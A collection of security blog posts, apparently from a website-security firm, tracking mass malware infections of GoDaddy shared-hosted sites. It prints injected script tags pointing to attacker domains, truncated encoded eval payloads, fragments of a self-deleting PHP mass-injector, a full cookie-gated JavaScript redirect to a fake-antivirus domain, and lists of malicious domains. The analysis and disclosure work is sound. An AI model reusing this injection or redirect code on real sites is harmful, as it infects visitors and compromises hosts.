GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:


Read More

Database injection and lessthenaminutehandle.com – Intermediary domains

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

Nothing much different from other web-based malware that we have been tracking. But what is interesting about this attack is how fast the intermediaries domains are changing to avoid detection and getting blacklisted.

These are just some of the ones used in the last 24 hours:

http://defender-dyxa.co.cc/scan1/188

http://antivirus-3879.co.cc/scan1/188

http://antivirus-9465.co.cc/scan1/188

http://antivirus-4274.co.cc/scan1/188

http://yquwtuog.co.cc/scan1/188

http://mrxzvtwt.co.cc/scan1/188

http://lowoxnsm.co.cc/scan1/188

http://iuhcypsp.co.cc/scan1/188

http://vycdmonz.co.cc/scan1/188

http://zgfozmcr.co.cc/scan1/188

http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D

http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D

http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D

http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D

http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D

http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D

http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D

www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

As you can see, changing from .cc, .co.cc, .in., .rr.nu and even some .com in there. Most of them are hosted at 46.252.130.200, but the IP address is changing as well. By checking those on Google, none of them got blacklisted, showing that their tactics are working.

We will keep posting details we learn more.


If your site is infected with malware or blacklisted, we are here to help.

Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).

This hack also injects the malware on every post in the database, but this time encoded as:

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..


Read More

Hilary Kneber Strikes Again – welcometotheglobalisnet

It seems that after a few months quiet, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts. Basically they modify every PHP file and the database to make sure every page in the infected site is loading malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>

Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

Which infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet so the risk is very high for everyone visiting an infected site.

What happens when someone clicks an infected site?

What the malware does is very simple, it contacts a few domains:

Read More

Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>

As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:

Read More

Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll.php?k=1

www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.in

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

www3.large-defense1.in


Read More

GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber

We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

Which are generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:



Read More

Here we go again – Problem at GoDaddy continues

Update from GoDaddy: Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.
Read More

Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, K evin Reville, got tired of getting hacked and setup a cron script to monitor his site and alert him when new files were added.

What did he found? He found the malware used by the attackers to infect everyone.

Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64 decoded file that looks like this: (see it in full MW:SIPRO:1)

eval(base64_decode(“DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3….

Decoded, this is what it does: (see the full content here)

1-First, removes itself:

$z=$_SERVER[“SCRIPT_FILENAME”];
@unlink($z);

2-Encodes the javascript:

$cod=base64_encode(‘< script src=”http://holasionweb.com/oo.php”>
$to_pack=’if(function_exists(\’ob_start\’)&&!isset($GLOBALS[\’mr_n..

3-Scan all directories and add the malware to all php files. After that, prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo “Working with $val\n”;
$start_time=microtime(true);
if ($val!=””)inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo “|Injected| $totalinjected files in $end_time seconds\n”;

So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Second round of GoDaddy sites hacked

It seems that a second round of attacks are happening today at GoDaddy and infecting all kind of sites (Joomla, Wordress,etc). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am.

All of them had the following javascript added to their pages:

script src= http://kdjkfjskdfjlskdjf.com/kp.php

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is how this kb.php file looks like:

function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==””){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string on the top of it:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYha
XNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.